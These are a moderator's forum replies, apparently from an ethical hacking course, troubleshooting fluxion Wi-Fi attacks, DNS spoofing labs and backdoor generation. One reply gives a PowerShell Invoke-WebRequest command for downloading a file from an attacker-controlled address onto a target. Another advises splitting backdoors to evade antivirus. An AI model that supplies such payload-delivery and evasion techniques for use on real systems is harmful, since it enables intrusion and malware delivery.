Forum Replies Created
- AuthorPosts
Diego Pérez
ModeratorHi!
This is a huge framework and will take a time to load, it can take up to 40 mins depending on the amount of RAM assigned to kali, the recommended is 6GB at least. So just give it a time.Greetings!
DiegoDiego Pérez
ModeratorHi!
Can you share some screenshots of the settings used in fluxion? Can you share the results of ifconfig BEFORE running the attack?Thanks!
DiegoDiego Pérez
ModeratorHi!
That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>Try using it.
Let me know how it goes!
DiegoDiego Pérez
ModeratorHi!
Thanks, give me a couple of days and I’ll get back to you.Greetings!
DiegoDiego Pérez
ModeratorHi!
Yeah, in macOS you’ll need to use the command open, if you just give it the name of the file nothing will happen, as you can see in the error message it saids command not found, so it thinks that image.jpg is a command and not a file.
So inside the subprocees call just add the command open befor the name of the file. You can test it directly in macOS terminal to check that it works.Hope it helps!
DiegoDiego Pérez
ModeratorHi!
If you want to use fluxion 2 then follow these steps:
https://github.com/hacker3983/how-to-install-pyrit-on-kali-linux-2020.1aJust don run apt-get upgrade.
Can you tell me the exact model of your adapter?(brand and model)
Greetings!
DiegoDiego Pérez
ModeratorHi!
Hope it helped!
DiegoDiego Pérez
ModeratorHi!
Can you post your code here? Bur use the CODE button in the interface so I can read it with the proper indentation and try it out.Let me know.
DiegoDiego Pérez
ModeratorHi!
Cool you got it!
DiegoDiego Pérez
ModeratorHi!
Try using this version instead:
https://github.com/FluxionNetwork/fluxionLet me know how it goes!
DiegoDiego Pérez
ModeratorHi!
It looks like you have to install a different version, take a look at this articles:https://installlion.com/kali/kali/main/p/pidgin-otr/install/index.html
https://otr.cypherpunks.ca/Hope it helps!
DiegoDiego Pérez
ModeratorHi!
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..So you need to keep trying different things, try to split it more.
Hope it helps!
DiegoDiego Pérez
ModeratorHi!
Yeah! That’s it, keep trying is the way.Greetings!
DiegoDiego Pérez
ModeratorHi!
Ok, but you didn’t pay attention to what I said. Does it work as a script? This is the first step and you haven’t clarified it.Let me know.
DiegoDiego Pérez
ModeratorHi!
There’s something strange with your network configuration, Why does your wlan0 has an ip in the rang of 10.0.0.1? Your target device is a windows virtual machine right? Is it installed in the same host as kali? Also you are missing the results of: get dns.spoof.*Let me know.
Diego- AuthorPosts